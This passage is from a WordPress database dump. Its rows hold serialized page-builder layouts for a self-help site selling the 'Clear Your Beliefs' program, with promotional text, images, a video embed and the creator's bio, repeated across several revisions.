(1028, 1530, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:537:"<div id="divStroke2">\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 160px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1029, 1531, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:557:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 160px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1030, 1532, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1032, 1533, 'panels_data', 'a:3:{s:7:"widgets";a:11:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: 